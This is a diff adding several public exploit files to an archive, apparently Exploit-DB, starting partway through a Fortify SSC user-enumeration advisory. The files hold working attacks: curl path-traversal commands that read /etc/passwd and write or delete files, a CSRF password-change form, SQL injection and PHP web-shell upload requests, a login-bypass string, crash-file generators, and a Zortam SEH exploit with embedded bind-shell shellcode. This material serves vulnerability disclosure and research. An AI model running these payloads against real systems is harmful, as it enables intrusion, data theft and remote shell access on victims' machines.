+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
+Content-Length: 123
+
+{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a
+
+Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:
+
+# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "Accept: application/json, text/plain, */*"
+-H "X-Requested-With: XMLHttpRequest"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Content-Type: application/json;charset=UTF-8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
+--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'
+
+You should see the following response:
+
+200
+
+Step (6): Now extract all local and LDAP users registered into Fortify SSC server:
+
+Payload:  /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as following:
+
+# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "Accept: application/json, text/plain, */*"
+-H "X-Requested-With: XMLHttpRequest"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Content-Type: application/json;charset=UTF-8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
+--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'
+
+You should see the following response with users available
+
+"admin"
+"sca"
+"alex"
+
+[../snip]
+
+Step (7): Automate with BurpSuite Pro/Free choose:
+
+Payload Positions: "Intruder Tab -> Positions" highlight as following:
+
+-> /api/v1/projectVersions/§1§/authEntities
+
+Payloads set: "Intruder Tab -> Payloads" with the following data:
+
+-> Payload set: 1
+
+-> Payload type: Numbers
+
+Payload Options [Numbers]:
+
+-> Type: Sequential
+
+-> From: 0
+
+-> To: 1500
+
+-> Step: 1
+
+Then start attack…
+Have fun!
+
+Have fun!
+
+Mitigations
+================
+Install the latest patches availabe here:
+https://softwaresupport.softwaregrp.com/doc/KM03298201
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx  (at) protonmail com to acknowledge this report.
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2018-05-24: Discovered
+2018-05-25: Retest PRO environment
+2018-05-31: Vendor notification, two issues found
+2018-05-31: Vendor feedback received
+2018-06-01: Internal communication
+2018-06-01: Vendor feedback, two issues are confirmed
+2018-06-05: Vendor notification, new issue found
+2018-06-06: Vendor feedback, evaluating High submission
+2018-06-08: Vendor feedback, High issue is confirmed
+2018-06-19: Researcher, reminder sent
+2018-06-22: Vendor feedback, summary of CVEs handled as official way
+2018-06-26: Vendor feedback, official Hotfix for High issue available to test
+2018-06-29: Researcher feedback
+2018-07-02: Researcher feedback
+2018-07-04: Researcher feedback, Hotfix tested on QA environment
+2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
+2018-08-02: Reminder to vendor, feedback received OK!
+2018-09-26: Reminder to vendor, feedback received OK!
+2018-09-26: Fixes received from the vendor
+2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Feedback from the vendor, technical details provided to the researcher
+2018-10-16: Fixes now tested on QA environment
+2018-11-08: Reminder received from the vendor, feedback provided by researcher
+2018-11-09: Re-rest fixes on QA environment
+2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
+2018-11-21: Researcher feedback
+2018-11-23: Fixes working well/confirmed by researcher
+2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
+2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
+2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
+2018-12-12: Public report
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db:
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576

exploits/php/webapps/45987.txt

@@ -0,0 +1,99 @@
+Responsive FileManager 9.13.4 - Multiple Vulnerabilities
+
+Date:
+  December 12, 2018
+
+Author:
+  farisv
+
+Vendor Homepage:
+  https://www.responsivefilemanager.com/
+
+Vulnerable Package Link:
+  https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.4/responsive_filemanager.zip
+
+
+Responsive FileManager is a free open-source file manager and image manager made with the jQuery library, CSS3, PHP and HTML5 that offers a nice and elegant way to upload and insert files, images and videos.
+You can use it as external plugin for TinyMCE version 4.x (and older), CKEditor CLEditor, or you can also use it as a stand-alone file manager to manage and select files.
+
+The following are the vulnerabilities found before v 9.14.0.
+
+1. Arbitrary file read via path traversal with `path` parameter through `get_file` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=get_file&sub_action=edit&preview_mode=text"
+<textarea id="textfile_edit_area" style="width:100%;height:300px;">root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+</textarea>%
+
+2. Arbitrary file read via path traversal with `path` parameter through `copy_cut` action in ajax_calls.php and `paste_clipboard` action in execute.php.
+
+# Copy/cut the file with directory traversal so the desired file path will be saved to the session.
+$ curl -X POST -d "sub_action=copy&path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=copy_cut"
+
+# Paste the clipboard
+$ curl -X POST -d "path=" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=paste_clipboard"
+
+# File is in the `upload_dir` folder or in the dialog page.
+$ curl http://localhost:1111/source/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+
+3. Arbitrary file write via path traversal mitigation bypass through `create_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.txt&new_content=Hacked" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=create_file"
+$ ls /tmp
+hacked.txt
+
+4. Arbitrary file deletion via path traversal mitigation bypass through `delete_file` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../../../../../../../../tmp/hacked.txt" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_file"
+
+5. Arbitrary directory deletion via path traversal mitigation bypass through `delete_folder` action in execute.php.
+
+# We can bypass the directory traversal mitigation by using an array.
+$ curl -X POST -d "paths[0]=../filemanager" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=delete_folder"
+
+6. Arbitrary file write (only with jpg/jpeg/png extension) with `path` parameter through `save_img` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../tmp/&name=hacked.jpg&url=http://s3.amazonaws.com/feather-files-aviary-prod-us-east-1/2444282ef4344e3dacdedc7a78f8877d/2018-10-23/44f0f34961464feb92b53d953b02d4bb.jpg" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=save_img"
+$ ls /tmp
+hacked.jpg
+
+7. Persistent XSS in `media_preview` action.
+
+Upload a file with valid media extension (e.g. mp3) with XSS payload in the name. For example, "a\"%2balert(document.cookie)%2b\"".mp3 will trigger `alert(document.cookie)` when previewed.

exploits/php/webapps/45992.html

@@ -0,0 +1,20 @@
+# Exploit Title:  Facebook And Google Reviews System For Businesses -  Cross-Site Request Forgery
+# Date: 2018-12-13
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+
+# 1 Poof Of Concept (Change password):
+<html>
+   <body>
+      <form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
+         <input class="form-control" name="name" value="Admin" type="text">
+         <input class="form-control" name="email" value="admin@ranksol.com" type="text">
+         <input class="form-control" name="password" value="password" type="text">
+         <input class="form-control" name="phone" value="+18323041166" type="text">
+         <input type="hidden" name="id" value="1">
+         <button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span>Save</button>
+      </form>
+   </body>
+</html>

exploits/php/webapps/45994.txt

@@ -0,0 +1,36 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+# 
+
+GET /[PATH]/reviews/campaign_add.php?id=%2d%31%27%20%20%55%4e%49%4f%4e+%53%45%4c%45%43%54+1,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29,3,4,5,%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33,24,25,%32%36%2c%32%37%2c%32%38%2c%32%39,30--+- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:09:22 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45995.txt

@@ -0,0 +1,84 @@
+# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
+# Dork: N/A
+# Date: 2018-12-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
+# 
+
+POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/octet-stream
+Content-Length: 922
+Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-----------------------------4704926813981: undefined
+Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
+<?php
+phpinfo();
+?>
+-----------------------------4704926813981
+Content-Disposition: form-data; name="hidden_photo"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="name"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="rating"
+4.5
+-----------------------------4704926813981
+Content-Disposition: form-data; name="review"
+Efe
+-----------------------------4704926813981
+Content-Disposition: form-data; name="date"
+12/14/2018
+-----------------------------4704926813981
+Content-Disposition: form-data; name="id"
+-----------------------------4704926813981
+Content-Disposition: form-data; name="submit"
+submit
+-----------------------------4704926813981--
+HTTP/1.1 302 Found
+Date: Fri, 14 Dec 2018 18:17:48 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: custom_reviews.php
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/[PATH]/reviews/custom_reviews.php
+Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
+DNT: 1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Fri, 14 Dec 2018 18:17:49 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.33
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45997.txt

@@ -0,0 +1,11 @@
+# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass
+# Date: 2018-12-08
+# Exploit Author: Veyselxan
+# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018
+# Version: v1 (REQUIRED)
+# Tested on: Linux
+http://traget/admin/index.php
+
+username: '=''or'
+
+Password: '=''or'

exploits/windows/dos/45993.py

@@ -0,0 +1,21 @@
+#!/usr/bin/python
+# -*- coding: cp1252 -*-
+# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
+# Author: Fernando Cruz
+# Date: 13/12/2018
+# Vendor Homepage: https://angryip.org
+# Tested Version: 3.11
+# Tested on Windows 10 Pro, 64-bit
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python angryip.py
+# 2.- Open angryip.txt and copy content to clipboard
+# 3.- Open Angry IP Scanner
+# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar",
+# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK",
+# 6.- Crashed
+
+buffer = "\x41" * 44455293
+f = open("angryip.txt" , 'w')
+f.write(buffer)
+f.close()

exploits/windows/dos/45996.py

@@ -0,0 +1,27 @@
+# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite
+# Discovery by: Francisco Ramirez
+# Discovery Date: 2018-12-14
+# Vendor Homepage: https://www.ultraiso.com/
+# Software Link : https://www.ultraiso.com/download.html
+# Tested Version: 9.7.1.3519
+# Tested on: Windows 10 Pro - 64 bit
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+ 
+# Steps to Produce the Crash: 
+# 1.- Run python code : python UltraISO_9.7.1.3519.py
+# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard
+# 3.- Open UltraISO_9.7.1.3519
+# 4.- In the Window select 'Tools' > 'Make CD/DVD Image' 
+# 5.- In the field  'Output FileName' remove the default path.
+# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName'
+# 7.- Click 'Make' and you will see a crash.
+ 
+#!/usr/bin/env python
+  
+a_letters = "\x41" * 304
+seRecord = "\x42" * 4
+sehRecord = "\x43" * 4
+buffer = a_letters + seRecord + sehRecord
+f = open ("UltraISO_9.7.1.3519.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/local/45988.py

@@ -0,0 +1,89 @@
+#Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit (SEH)
+#Version:  24.15
+#Exploit Author: Manpreet Singh Kheberi
+#Date:  December 13 2018
+#Download Link: https://www.zortam.com/download.html
+#Vendor Homepage: https://www.zortam.com
+#Tested on:  Windows Xp Sp3 x64
+#Type: Bind shell
+print "-----------------------------------------------------------------------------------------------------------------------"
+print "                                      Zortam MP3 media studio Exploit  (SEH)      "
+print "                                      by Manpreet Singh Kheberi       "
+print "Generated File zortam-exploit.txt            "
+print "INSTRUCTIONS:" 
+print "Go to File > New mp3 Library > Yes > Paste the payload in select textfield > click ok > You have a shell on port 4444 "
+print "-----------------------------------------------------------------------------------------------------------------------"
+
+
+filename = "zortam-exploit.txt"
+junk = "\x41"*268
+nseh="\x90\x90\xeb\x12"
+
+seh ="\x8e\x32\xb5\x02" 
+
+nop="\x90"*19
+brk="\x90\x90\x90\x90"
+
+# bind shell generated using metasploit 
+#msfvenom -p windows/shell_bind_tcp LPORT=4444 -f python
+# This will open a bind shell on port 4444
+# use ncat Target-IP 4444
+
+buf =  ""
+buf += "\xda\xdf\xbd\xb7\x95\xd2\xc2\xd9\x74\x24\xf4\x5b\x33"
+buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x6b\x13\x03\xdc\x86\x30"
+buf += "\x37\xde\x41\x36\xb8\x1e\x92\x57\x30\xfb\xa3\x57\x26"
+buf += "\x88\x94\x67\x2c\xdc\x18\x03\x60\xf4\xab\x61\xad\xfb"
+buf += "\x1c\xcf\x8b\x32\x9c\x7c\xef\x55\x1e\x7f\x3c\xb5\x1f"
+buf += "\xb0\x31\xb4\x58\xad\xb8\xe4\x31\xb9\x6f\x18\x35\xf7"
+buf += "\xb3\x93\x05\x19\xb4\x40\xdd\x18\x95\xd7\x55\x43\x35"
+buf += "\xd6\xba\xff\x7c\xc0\xdf\x3a\x36\x7b\x2b\xb0\xc9\xad"
+buf += "\x65\x39\x65\x90\x49\xc8\x77\xd5\x6e\x33\x02\x2f\x8d"
+buf += "\xce\x15\xf4\xef\x14\x93\xee\x48\xde\x03\xca\x69\x33"
+buf += "\xd5\x99\x66\xf8\x91\xc5\x6a\xff\x76\x7e\x96\x74\x79"
+buf += "\x50\x1e\xce\x5e\x74\x7a\x94\xff\x2d\x26\x7b\xff\x2d"
+buf += "\x89\x24\xa5\x26\x24\x30\xd4\x65\x21\xf5\xd5\x95\xb1"
+buf += "\x91\x6e\xe6\x83\x3e\xc5\x60\xa8\xb7\xc3\x77\xcf\xed"
+buf += "\xb4\xe7\x2e\x0e\xc5\x2e\xf5\x5a\x95\x58\xdc\xe2\x7e"
+buf += "\x98\xe1\x36\xea\x90\x44\xe9\x09\x5d\x36\x59\x8e\xcd"
+buf += "\xdf\xb3\x01\x32\xff\xbb\xcb\x5b\x68\x46\xf4\x72\x35"
+buf += "\xcf\x12\x1e\xd5\x99\x8d\xb6\x17\xfe\x05\x21\x67\xd4"
+buf += "\x3d\xc5\x20\x3e\xf9\xea\xb0\x14\xad\x7c\x3b\x7b\x69"
+buf += "\x9d\x3c\x56\xd9\xca\xab\x2c\x88\xb9\x4a\x30\x81\x29"
+buf += "\xee\xa3\x4e\xa9\x79\xd8\xd8\xfe\x2e\x2e\x11\x6a\xc3"
+buf += "\x09\x8b\x88\x1e\xcf\xf4\x08\xc5\x2c\xfa\x91\x88\x09"
+buf += "\xd8\x81\x54\x91\x64\xf5\x08\xc4\x32\xa3\xee\xbe\xf4"
+buf += "\x1d\xb9\x6d\x5f\xc9\x3c\x5e\x60\x8f\x40\x8b\x16\x6f"
+buf += "\xf0\x62\x6f\x90\x3d\xe3\x67\xe9\x23\x93\x88\x20\xe0"
+buf += "\xa3\xc2\x68\x41\x2c\x8b\xf9\xd3\x31\x2c\xd4\x10\x4c"
+buf += "\xaf\xdc\xe8\xab\xaf\x95\xed\xf0\x77\x46\x9c\x69\x12"
+buf += "\x68\x33\x89\x37"
+
+#boom+= "\xCC\xCC\xCC\xCC"
+#calc.exe
+
+
+# Used for initial exploit development phase
+bchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
+bchar += "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
+bchar +="x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
+bchar +="x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
+bchar +="x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
+bchar +="x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
+bchar +="x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
+bchar +="x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
+bchar +="x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
+bchar +="x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
+bchar +="xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
+bchar +="xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
+bchar +="xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
+bchar +="xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
+bchar +="xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
+bchar +="xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
+
+
+ 
+exploit = junk+nseh+seh+nop+brk+buf
+textfile = open(filename,"w")
+textfile.write(exploit)
+textfile.close()

files_exploits.csv

@@ -6212,6 +6212,8 @@ id,file,description,date,author,type,platform,port
 45968,exploits/windows/dos/45968.py,"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)",2018-12-11,"Gionathan Reale",dos,windows,
 45983,exploits/linux/dos/45983.txt,"Linux - 'userfaultfd' Bypasses tmpfs File Permissions",2018-12-13,"Google Security Research",dos,linux,
 45984,exploits/multiple/dos/45984.html,"WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains",2018-12-13,"Google Security Research",dos,multiple,
+45993,exploits/windows/dos/45993.py,"Angry IP Scanner 3.5.3 - Denial of Service (PoC)",2018-12-14,"Fernando Cruz",dos,windows,
+45996,exploits/windows/dos/45996.py,"UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)",2018-12-14,"Francisco Ramirez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10145,6 +10147,7 @@ id,file,description,date,author,type,platform,port
 45960,exploits/multiple/local/45960.txt,"XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection",2018-12-11,"Google Security Research",local,multiple,
 45961,exploits/windows/local/45961.txt,"McAfee True Key - McAfee.TrueKey.Service Privilege Escalation",2018-12-11,"Google Security Research",local,windows,
 45985,exploits/windows/local/45985.rb,"CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)",2018-12-13,Metasploit,local,windows,
+45988,exploits/windows/local/45988.py,"Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)",2018-12-14,"Manpreet Singh Kheberi",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17002,6 +17005,8 @@ id,file,description,date,author,type,platform,port
 45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
 45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
 45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
+45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
+45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38035,7 +38040,7 @@ id,file,description,date,author,type,platform,port
 43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,
 43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php,
 43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp,
-43593,exploits/php/webapps/43593.py,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
+43593,exploits/php/webapps/43593.txt,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
